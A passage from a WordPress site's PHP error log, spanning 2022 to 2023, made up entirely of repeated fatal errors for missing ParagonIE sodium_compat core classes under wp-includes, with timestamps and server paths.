UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Salsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php on line 4 [15-Nov-2022 03:00:53 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [15-Nov-2022 13:18:23 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php on line 4 [19-Nov-2022 01:59:13 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_X25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php on line 4 [21-Nov-2022 08:08:08 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [21-Nov-2022 20:17:42 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_X25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php on line 4 [25-Nov-2022 03:58:01 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_X25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php on line 4 [25-Nov-2022 17:53:22 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_X25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php on line 4 [25-Nov-2022 19:51:21 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Util' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php on line 4 [26-Nov-2022 11:03:59 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php on line 4 [28-Nov-2022 00:18:17 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [29-Nov-2022 03:02:34 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Salsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php on line 4 [29-Nov-2022 15:55:23 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_X25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php on line 4 [30-Nov-2022 03:26:23 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [01-Dec-2022 16:24:35 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [02-Dec-2022 20:30:31 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php on line 4 [05-Dec-2022 04:43:47 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Ed25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php on line 4 [05-Dec-2022 22:59:22 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Salsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php on line 4 [13-Dec-2022 08:12:36 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Util' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php on line 4 [15-Dec-2022 09:04:55 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php on line 4 [18-Dec-2022 16:27:33 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php on line 4 [20-Dec-2022 06:48:59 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [20-Dec-2022 12:26:33 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php on line 4 [22-Dec-2022 13:25:47 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [24-Dec-2022 03:50:32 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [25-Dec-2022 17:14:08 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Ed25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php on line 4 [30-Dec-2022 08:24:13 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [11-Jan-2023 20:43:25 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Ed25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php on line 4 [14-Jan-2023 03:44:15 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_SipHash' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php on line 4 [18-Jan-2023 12:38:24 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php on line 4 [19-Jan-2023 05:59:16 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [19-Jan-2023 23:56:01 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Poly1305' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php on line 4 [24-Jan-2023 12:32:16 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php on line 4 [25-Jan-2023 03:51:24 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [26-Jan-2023 00:41:27 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [29-Jan-2023 01:23:27 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Salsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php on line 4 [31-Jan-2023 20:28:20 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [01-Feb-2023 05:57:14 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [03-Feb-2023 01:29:14 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Ed25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php on line 4 [05-Feb-2023 14:20:11 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Salsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php on line 4 [06-Feb-2023 17:14:18 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php on line 4 [10-Feb-2023 08:11:21 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Util' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php on line 4 [13-Feb-2023 01:34:59 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [13-Feb-2023 10:13:54 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_X25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php on line 4 [18-Feb-2023 18:55:55 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [20-Feb-2023 00:30:17 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php on line 4 [21-Feb-2023 13:35:34 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php on line 4 [25-Feb-2023 16:59:23 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php on line 4 [26-Feb-2023 15:56:46 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_SipHash' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php on line 4 [27-Feb-2023 09:19:50 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [28-Feb-2023 01:11:08 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php on line 4 [28-Feb-2023 10:26:20 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php on line 4 [05-Mar-2023 16:18:21 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php on line 4 [07-Mar-2023 23:22:21 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [11-Mar-2023 21:18:22 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php on line 4 [13-Mar-2023 18:08:34 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Salsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php on line 4 [20-Mar-2023 01:35:09 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php on line 4 [26-Mar-2023 14:04:57 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Salsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php on line 4 [08-Apr-2023 19:05:43 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php on line 4 [10-Apr-2023 00:04:01 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Util' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Util.php on line 4 [03-May-2023 20:32:30 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Ed25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php on line 4 [19-May-2023 13:11:13 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php on line 4 [31-May-2023 15:01:57 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php on line 4 [07-Jul-2023 15:34:19 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php on line 4 [08-Jul-2023 05:31:28 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_X25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php on line 4 [08-Jul-2023 20:49:34 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Salsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php on line 4 [09-Jul-2023 04:16:34 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [10-Jul-2023 20:43:18 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php on line 4 [11-Jul-2023 18:54:31 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Ed25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php on line 4 [14-Jul-2023 09:48:47 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_X25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php on line 4 [15-Jul-2023 16:25:51 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [16-Jul-2023 02:26:51 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Poly1305' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php on line 4 [16-Jul-2023 13:37:21 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HChaCha20.php on line 4 [20-Jul-2023 04:04:14 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Ed25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Ed25519.php on line 4 [21-Jul-2023 03:08:04 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php on line 4 [21-Jul-2023 16:33:57 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php on line 4 [22-Jul-2023 14:44:44 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Poly1305' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php on line 4 [25-Jul-2023 16:22:39 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Curve25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Curve25519.php on line 4 [27-Jul-2023 00:02:00 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_SipHash' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/SipHash.php on line 4 [30-Jul-2023 14:14:41 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Poly1305' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Poly1305.php on line 4 [31-Jul-2023 08:35:33 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_BLAKE2b' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/BLAKE2b.php on line 4 [01-Aug-2023 12:32:07 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Salsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php on line 4 [01-Aug-2023 19:01:19 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_ChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/ChaCha20.php on line 4 [02-Aug-2023 11:13:03 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php on line 4 [04-Aug-2023 06:56:57 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_X25519' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/X25519.php on line 4 [04-Aug-2023 08:27:57 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_HSalsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/HSalsa20.php on line 4 [07-Aug-2023 05:32:14 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_XChaCha20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php on line 4 [08-Aug-2023 01:47:11 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_Salsa20' not found in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php:4 Stack trace: #0 {main} thrown in /home/barghamad/public_html/wp-includes/sodium_compat/namespaced/Core/Salsa20.php on line 4 [11-Aug-2023 07:43:39 UTC] PHP Fatal error: Uncaught Error: Class 'ParagonIE_Sodium_Core_X25519' not found in 